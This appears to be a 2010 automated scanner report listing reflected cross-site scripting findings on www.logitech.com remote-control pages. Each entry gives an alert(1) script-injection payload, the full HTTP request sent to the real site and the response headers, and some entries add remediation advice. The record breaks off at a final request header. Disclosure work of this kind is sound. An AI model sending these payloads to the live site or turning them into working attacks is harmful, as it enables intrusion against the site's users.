<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 291e7"><script>alert(1)</script>58ec79205d8 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-us/remotes/accessories291e7"><script>alert(1)</script>58ec79205d8 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:51:56 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f7957</script><script>alert(1)</script>b39ef96d5b6 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-us/remotes/accessoriesf7957</script><script>alert(1)</script>b39ef96d5b6 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:52:03 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2de9a</script><script>alert(1)</script>ba27df14770 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /2de9a</script><script>alert(1)</script>ba27df14770/remotes/overview HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:51:42 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d2150"><script>alert(1)</script>13694c2539a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-usd2150"><script>alert(1)</script>13694c2539a/remotes/overview HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:51:35 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7430d"%3b10382d07810 was submitted in the REST URL parameter 1. This input was echoed as 7430d";10382d07810 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-us7430d"%3b10382d07810/remotes/overview HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:51:36 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 866fe</script><script>alert(1)</script>8fd1dd68ed9 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-us/remotes866fe</script><script>alert(1)</script>8fd1dd68ed9/overview HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:51:56 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9397a"><script>alert(1)</script>b9772cf4d98 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-us/remotes9397a"><script>alert(1)</script>b9772cf4d98/overview HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:51:43 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d0d83"><script>alert(1)</script>d161ca6eefd was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-us/remotes/overviewd0d83"><script>alert(1)</script>d161ca6eefd?WT.ac=nav HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:52:00 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5ef38</script><script>alert(1)</script>583f58ebd4c was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-us/remotes/overview5ef38</script><script>alert(1)</script>583f58ebd4c?WT.ac=nav HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:52:06 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 499ed</script><script>alert(1)</script>4ccb66b5d73 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /499ed</script><script>alert(1)</script>4ccb66b5d73/remotes/universal-remotes HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:51:46 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5bbd1"><script>alert(1)</script>65ae30fbe09 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-us5bbd1"><script>alert(1)</script>65ae30fbe09/remotes/universal-remotes HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:51:41 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dfa63"><script>alert(1)</script>51ec35e222e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-us/remotesdfa63"><script>alert(1)</script>51ec35e222e/universal-remotes HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:51:47 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 82ccd</script><script>alert(1)</script>820b515c04 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-us/remotes82ccd</script><script>alert(1)</script>820b515c04/universal-remotes HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:51:52 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 74aee</script><script>alert(1)</script>9e4786c2916 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-us/remotes/universal-remotes74aee</script><script>alert(1)</script>9e4786c2916 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:51:58 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 16468"><script>alert(1)</script>0f6c64cb0 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-us/remotes/universal-remotes16468"><script>alert(1)</script>0f6c64cb0 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:51:53 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload eb574"><script>alert(1)</script>d589ac3eaf6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /en-useb574"><script>alert(1)</script>d589ac3eaf6/remotes/universal-remotes/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:01:21 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8a805</script><script>alert(1)</script>196e7633dc2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /8a805</script><script>alert(1)</script>196e7633dc2/remotes/universal-remotes/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:01:28 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8b753"><script>alert(1)</script>b4d6ed546d7 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /en-us/remotes8b753"><script>alert(1)</script>b4d6ed546d7/universal-remotes/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:01:33 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6fadd</script><script>alert(1)</script>4d5e2636575 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-us/remotes6fadd</script><script>alert(1)</script>4d5e2636575/universal-remotes/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:01:40 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 22b8d</script><script>alert(1)</script>07d7aad21a4 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-us/remotes/universal-remotes22b8d</script><script>alert(1)</script>07d7aad21a4/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:01:49 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a92cb"><script>alert(1)</script>e3d878badb4 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /en-us/remotes/universal-remotesa92cb"><script>alert(1)</script>e3d878badb4/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:01:42 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ea7cc"><script>alert(1)</script>fac7e999d1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /en-usea7cc"><script>alert(1)</script>fac7e999d1/remotes/universal-remotes/devices/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:01:11 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a04da"%3ba413434509f was submitted in the REST URL parameter 1. This input was echoed as a04da";a413434509f in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-usa04da"%3ba413434509f/remotes/universal-remotes/devices/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 404 Not Found Content-Type: text/html; charset=UTF-8 Server: Apache AK-control: no-store Date: Fri, 12 Nov 2010 13:01:11 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d602c</script><script>alert(1)</script>b09c5be6911 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /d602c</script><script>alert(1)</script>b09c5be6911/remotes/universal-remotes/devices/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:01:19 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 66fa4</script><script>alert(1)</script>1f4c1d0d7a8 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-us/remotes66fa4</script><script>alert(1)</script>1f4c1d0d7a8/universal-remotes/devices/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:01:29 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c7bdd"><script>alert(1)</script>a3f06c80ee6 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /en-us/remotesc7bdd"><script>alert(1)</script>a3f06c80ee6/universal-remotes/devices/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:01:22 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 43639</script><script>alert(1)</script>06f5bb14f13 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
